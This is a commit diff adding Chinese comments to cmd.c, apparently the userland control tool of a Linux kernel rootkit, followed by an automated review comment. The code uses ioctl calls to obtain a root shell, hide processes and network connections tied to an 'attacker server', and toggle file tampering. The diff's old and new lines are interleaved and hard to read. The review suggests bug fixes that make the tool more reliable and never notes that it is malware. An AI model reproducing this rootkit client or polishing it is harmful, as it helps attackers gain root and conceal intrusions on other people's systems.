Update cmd.c

Scripts解析
pti2ume7z 7 months ago
parent 0b5f28d2b0
commit 10e0d3a49b

@ -10,178 +10,189 @@
#include <sys/types.h> #include <sys/types.h>
#include <unistd.h> #include <unistd.h>
// 定义默认的shell路径
#define SHELL "/bin/bash" #define SHELL "/bin/bash"
/**
* @brief
*/
struct control { struct control {
unsigned short cmd; unsigned short cmd; // 命令类型
void *argv; void *argv; // 命令参数
}; };
/**
* @brief
* @param argc
* @param argv
* @return int
*/
int main(int argc, char **argv) int main(int argc, char **argv)
{ {
int sockfd; int sockfd; // 套接字文件描述符
struct control args; struct control args; // 控制结构体实例
struct sockaddr_in addr; struct sockaddr_in addr; // 地址结构体实例
struct hostent *host; struct hostent *host; // 主机信息结构体指针
unsigned int pid; unsigned int pid; // 进程ID
char *bash = SHELL; char *bash = SHELL; // shell路径
char *envp[1] = {NULL}; char *envp[1] = {NULL}; // 环境变量数组
char *arg[3] = {SHELL, NULL}; char *arg[3] = {SHELL, NULL}; // 执行shell的命令参数
if (argc < 2) // 如果参数少于2个退出程序
exit(0); if (argc < 2)
exit(0);
sockfd = socket(AF_INET, SOCK_STREAM, 6);
if (sockfd < 0) // 创建TCP套接字
goto fail; sockfd = socket(AF_INET, SOCK_STREAM, 6);
if (sockfd < 0)
if (strcmp(argv[1], "root") == 0) { goto fail; // 如果创建失败跳转到fail标签
if (geteuid() == 0) {
printf("You are already root! :)\n\n"); // 如果第一个参数是"root"
close(sockfd); if (strcmp(argv[1], "root") == 0) {
goto out; // 如果已经是root用户提示并关闭套接字后退出
} if (geteuid() == 0) {
printf("You are already root! :)\n\n");
args.cmd = 3; close(sockfd);
goto out;
if (ioctl(sockfd, AUTH, HTUA) == 0) { }
ioctl(sockfd, AUTH, &args);
ioctl(sockfd, AUTH, HTUA); args.cmd = 3; // 设置命令为3
}
// 通过ioctl系统调用进行身份验证
if (geteuid() == 0) { if (ioctl(sockfd, AUTH, HTUA) == 0) {
printf("\e[01;36mYou got super powers!\e[00m\n\n"); ioctl(sockfd, AUTH, &args);
execve(bash, arg, envp); ioctl(sockfd, AUTH, HTUA);
} else { }
printf("\e[00;31mYou have no power here! :( \e[00m\n\n");
} // 如果成功获取root权限执行shell否则提示无权限
if (geteuid() == 0) {
goto out; printf("\e[01;36mYou got super powers!\e[00m\n\n");
} execve(bash, arg, envp);
} else {
if (strcmp(argv[1], "hide") == 0 || strcmp(argv[1], "show") == 0) { printf("\e[00;31mYou have no power here! :( \e[00m\n\n");
if (argc < 2) }
goto fail;
goto out; // 跳转到out标签
if (argc == 2) { }
args.cmd = 0;
// 如果第一个参数是"hide"或"show"
if (ioctl(sockfd, AUTH, HTUA) == 0) { if (strcmp(argv[1], "hide") == 0 || strcmp(argv[1], "show") == 0) {
if (ioctl(sockfd, AUTH, &args) == 0) { // 如果参数少于2个跳转到fail标签
if (ioctl(sockfd, AUTH, HTUA) == 0) { if (argc < 2)
printf("\e[01;32mSuccess!\e[00m\n"); goto fail;
goto out;
} // 如果只有一个参数,隐藏或显示所有连接
} if (argc == 2) {
} args.cmd = 0; // 设置命令为0
} else {
// 通过ioctl系统调用进行身份验证
args.cmd = 1; if (ioctl(sockfd, AUTH, HTUA) == 0) {
pid = (unsigned int)atoi(argv[2]); if (ioctl(sockfd, AUTH, &args) == 0) {
args.argv = &pid; if (ioctl(sockfd, AUTH, HTUA) == 0) {
printf("\e[01;32mSuccess!\e[00m\n");
if (ioctl(sockfd, AUTH, HTUA) == 0) { goto out; // 成功后跳转到out标签
if (ioctl(sockfd, AUTH, &args) == 0) { }
if (ioctl(sockfd, AUTH, HTUA) == 0) { }
printf("\e[01;32mSuccess!\e[00m\n"); }
goto out; } else { // 如果有两个参数隐藏或显示指定PID的连接
} args.cmd = 1; // 设置命令为1
} pid = (unsigned int)atoi(argv[2]); // 将第二个参数转换为PID
} args.argv = &pid; // 设置命令参数为PID
}
} // 通过ioctl系统调用进行身份验证
if (ioctl(sockfd, AUTH, HTUA) == 0) {
if (strcmp(argv[1], "file-tampering") == 0) { if (ioctl(sockfd, AUTH, &args) == 0) {
args.cmd = 2; if (ioctl(sockfd, AUTH, HTUA) == 0) {
printf("\e[01;32mSuccess!\e[00m\n");
if (ioctl(sockfd, AUTH, HTUA) == 0) { goto out; // 成功后跳转到out标签
if (ioctl(sockfd, AUTH, &args) == 0) { }
if (ioctl(sockfd, AUTH, HTUA) == 0) { }
printf("\e[01;32mSuccess!\e[00m\n"); }
goto out; }
} }
}
} // 如果第一个参数是"file-tampering"
} if (strcmp(argv[1], "file-tampering") == 0) {
args.cmd = 2; // 设置命令为2
if (strcmp(argv[1], "conn") == 0) {
if (argc < 4) // 通过ioctl系统调用进行身份验证
goto fail; if (ioctl(sockfd, AUTH, HTUA) == 0) {
if (ioctl(sockfd, AUTH, &args) == 0) {
if (strcmp(argv[4], "hide") == 0) { if (ioctl(sockfd, AUTH, HTUA) == 0) {
args.cmd = 4; printf("\e[01;32mSuccess!\e[00m\n");
} else if (strcmp(argv[4], "show") == 0) { goto out; // 成功后跳转到out标签
args.cmd = 5; }
} else { }
goto fail; }
} }
host = gethostbyname(argv[2]); // 如果第一个参数是"conn"
if (strcmp(argv[1], "conn") == 0) {
if (host == NULL) // 如果参数少于4个跳转到fail标签
goto fail; if (argc < 4)
goto fail;
memcpy((void *)&addr.sin_addr, (void *)host->h_addr,
host->h_length); // 根据第四个参数设置命令为4hide或5show
if (strcmp(argv[4], "hide") == 0) {
addr.sin_family = AF_INET; args.cmd = 4; // 设置命令为4
addr.sin_port = htons(atoi(argv[3])); } else if (strcmp(argv[4], "show") == 0) {
args.cmd = 5; // 设置命令为5
args.argv = &addr; } else {
goto fail; // 如果第四个参数不是"hide"或"show"跳转到fail标签
if (ioctl(sockfd, AUTH, HTUA) == 0) { }
if (ioctl(sockfd, AUTH, &args) == 0) {
if (ioctl(sockfd, AUTH, HTUA) == 0) { // 获取主机信息
printf("\e[01;32mSuccess!\e[00m\n"); host = gethostbyname(argv[2]);
goto out; if (host == NULL)
} goto fail; // 如果获取主机信息失败跳转到fail标签
}
} // 复制主机地址到地址结构体中
} memcpy((void *)&addr.sin_addr, (void *)host->h_addr, host->h_length);
addr.sin_family = AF_INET; // 设置地址族为IPv4
addr.sin_port = htons(atoi(argv[3])); // 设置端口号
args.argv = &addr; // 设置命令参数为地址结构体指针
// 通过ioctl系统调用进行身份验证
if (ioctl(sockfd, AUTH, HTUA) == 0) {
if (ioctl(sockfd, AUTH, &args) == 0) {
if (ioctl(sockfd, AUTH, HTUA) == 0) {
printf("\e[01;32mSuccess!\e[00m\n");
goto out; // 成功后跳转到out标签
}
}
}
}
/* /*
UDPTCP使
// This part is deprecated. There is no reason to hide specific protocols if (strcmp(argv[1], "udp") == 0) {
// when you want to hide some connection, in the most of cases you will if (argc < 4)
// need to hide every connection and everything about your attacker server. goto fail;
if (strcmp(argv[4], "hide") == 0) {
if (strcmp(argv[1], "udp") == 0) { args.cmd = 6;
if (argc < 4) } else if (strcmp(argv[4], "show") == 0) {
goto fail; args.cmd = 7;
} else {
if (strcmp(argv[4], "hide") == 0) { goto fail;
args.cmd = 6; }
} else if (strcmp(argv[4], "show") == 0) { host = gethostbyname(argv[2]);
args.cmd = 7; if (host == NULL)
} else { goto fail;
goto fail; memcpy((void *)&addr.sin_addr, (void *)host->h_addr, host->h_length);
} addr.sin_family = AF_INET;
addr.sin_port = htons(atoi(argv[3]));
host = gethostbyname(argv[2]); args.argv = &addr;
if (ioctl(sockfd, AUTH, HTUA) == 0) {
if (host == NULL) if (ioctl(sockfd, AUTH, &args) == 0) {
goto fail; if (ioctl(sockfd, AUTH, HTUA) == 0) {
printf("\e[01;32mSuccess!\e[00m\n");
memcpy((void *)&addr.sin_addr, (void *)host->h_addr, goto out;
host->h_length); }
}
addr.sin_family = AF_INET; }
addr.sin_port = htons(atoi(argv[3])); }*/
fail: // fail标签打印失败信息并关闭套接字
args.argv = &addr; printf("\e[01;31mFailed!\e[00m\n");
out: // out标签关闭套接字并返回0表示程序结束
if (ioctl(sockfd, AUTH, HTUA) == 0) { close(sockfd); // 关闭套接字文件描述符
if (ioctl(sockfd, AUTH, &args) == 0) { return 0; // 返回0表示程序正常结束
if (ioctl(sockfd, AUTH, HTUA) == 0) {
printf("\e[01;32mSuccess!\e[00m\n");
goto out;
}
}
}
}
*/
fail:
printf("\e[01;31mFailed!\e[00m\n");
out:
close(sockfd);
return 0;
} }
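Review bot: The `conn` branch guards with `if (argc < 4) goto fail;` but the very next statement reads `argv[4]`, so running `cmd conn HOST PORT` with exactly four arguments passes the argv NULL terminator to `strcmp` and crashes; the guard should be `if (argc < 5) goto fail;`. The same branch copies `host->h_length` bytes into the 4-byte `addr.sin_addr` with no check of `host->h_addrtype`, which is only safe for the IPv4 results `gethostbyname` normally returns; `if (host->h_addrtype != AF_INET || host->h_length != sizeof addr.sin_addr) goto fail;` would make that explicit. `addr` is never zeroed either, so `sin_zero` holds stack garbage when its address is handed to the kernel through `ioctl`; a `memset(&addr, 0, sizeof addr);` before the `memcpy` fixes that, and the port and PID would be better parsed with `strtol` and range-checked than with `atoi`, which silently yields 0 on bad input. On style, the added comments are in Chinese while the retained deprecation comment is in English, and most of them restate the line they annotate (`// 设置命令为0`) rather than explaining intent; a single comment at the top of `main` describing the HTUA/args/HTUA three-call `ioctl` sequence that every branch repeats would be more useful than per-line echoes. `main` starts and ends inside this hunk.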